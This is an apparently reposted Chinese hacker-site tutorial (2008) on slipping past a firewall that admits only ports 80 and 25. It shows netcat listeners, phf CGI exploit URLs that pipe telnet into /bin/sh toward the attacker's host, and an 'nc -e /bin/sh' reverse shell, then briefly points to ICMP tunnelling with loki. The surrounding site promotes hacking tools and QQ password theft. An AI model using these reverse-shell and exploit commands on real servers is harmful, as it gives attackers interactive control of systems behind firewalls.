设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 破解技术 -> 文章内容 [站内搜索]  

 
利用反向通道与隧道技术透过firewall
作者:不详  来源:网络  发布时间:2008-1-7 19:59:07  发布人:www.hack86.com
利用反向通道与隧道技术透过firewall 
--------------------------------------------------------------------------------
 反向通道技术
比如说一台为于firewall之后的服务器A(ip:ipA),我的机子为B(ip:ipB)。
firewall只允许到来的数据包到达A的80和25端口,其他
一切拒绝。
现在先在自己的机子上执行
[sztcww@haha sztcww]# nc -l -n -v -p 80
[sztcww@haha sztcww]# nc -l -n -v -p 25
假如在A的机子上找到这个phf漏洞(不过现在还能找到吗,呵呵,
所以只做参考用)。现在可以利用以下几个命令来得到一个真正的
SHELL(说它是真正的是因为phf的漏洞利用也可以称为一个SHELL了)。
/cgi-bin/phf?Qalias=x%0a/bin/telnet%20ipB%2080%20|%20/bin/sh%20|
                     %20/bin/telnet%20ipB%2025
相当于在A的机子上执行了
telnet ipB 80|sh|telnet ipB 25
这样就利用反向tlenet铲回一个shell.
为什么可以在B的机子上得到一个A的SHELL,如果不知道,请翻看一下
管道的作用。
如果在A的机子上可以找到nc的话,也可以这样。
在我B机子上:
[sztcww@haha sztcww]# nc -l -n -v -p 80
A上:
/cgi-bin/phf?Qalias=x%0a/bin/nc%20-e%20/bin/sh%20ipB%2080

因为连接是从firewall之后的A服务器发起的,所以一般是能够通信的。

2:隧道技术
一般是利用ICMP封装真正的数据,也有UDP等其他的协议可以利用。
一般如果firewall不block icmp的话,就可以利用icmp隧道技术
与一台firewall之后的受害机子通信,也就是说可以得到
firewall之后的受害机子的一个SHELL。
关于这个更详细的讨论请参考Phrack的p49-6
可利用的工具有loki和lokid 
 
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  另辟蹊径 利用别人提..
利用WINXP组策略实现..
报告称100多个国家利..
自己利用BCB写病毒专..
利用Promqryui软件 ..
黑客利用“安吉丽娜..
跨出权限—世纪热线..
Bjshop网上购物系统..
利用系统自带命令搞..
"AV终结者"新变种利..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
18岁少女欲6000元卖处女身 救患血..
8款QQ空间免费开场动画
免费QQ蓝钻体验(附考试答案)
 
不可错过!WinRAR的三种安全战术.. 01-12
利用反向通道与隧道技术透过fire.. 01-07
轻松将jmp esp方式 改写为jmp eb.. 01-07
缓冲区溢出原理浅析以及防护 01-07
另辟蹊径 利用别人提供的程序二次.. 01-07
让恶意软件肝颤,卡卡安全助手5... 01-07
让数据更安全 6招实战EFS加密技巧.. 01-07
海南一17岁高中生盗窃网络银行6万.. 01-07
警惕“黑客遥控器9728”遥控你的.. 01-07
局域网本周小心 网页病毒下载器.. 01-07
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com